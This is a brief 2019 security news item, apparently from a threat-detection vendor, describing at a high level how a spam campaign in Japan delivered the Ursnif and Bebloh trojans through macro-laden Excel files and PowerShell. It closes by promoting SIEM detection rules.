Delaware, USA – March 14, 2019 – A new tsunami of spam struck Japan, infecting users with the latest versions of the Ursnif and Bebloh trojans. In the current campaign, adversaries use a version of Ursnif compiled just a few weeks ago that has a number of new features. Researchers at Cybereason recorded a massive spam attack and analyzed the malware used. Adversaries send tens of thousands of emails containing Excel file with malicious VBA macro, which runs a PowerShell code that performs several checks to make sure that the attacked system not only has Japanese as a primary language but is also physically located in Japan. Next, an image from a free hosting is downloaded to the system, and the script extracts Bebloh trojan’s code from an image and injects it into the system process. In this attack, Bebloh is used as a dropper to get the Ursnif’s loader from the command and control server. Depending on the bitness of the operating system, loader unpacks embedded DLL file and injects it into the explorer.exe process.
The new version of the Trojan, in addition to extra location checks, has acquired several unpleasant features, such as a new way of maintaining persistence, bypassing the popular in Japan antivirus solution, as well as new options for stealing emails and data from cryptocurrency wallets and disk encryption tools. In the past few years, adversaries behind this Ursnif modification regularly attack Japanise to steal valuable financial information. It is also worth noting that the use of PowerShell in attacks has increased ten times over the last year. You can leverage the rules for your SIEM tool available in the Threat Detection Marketplace to detect malicious use of PowerShell: https://my.socprime.com/en/tdm/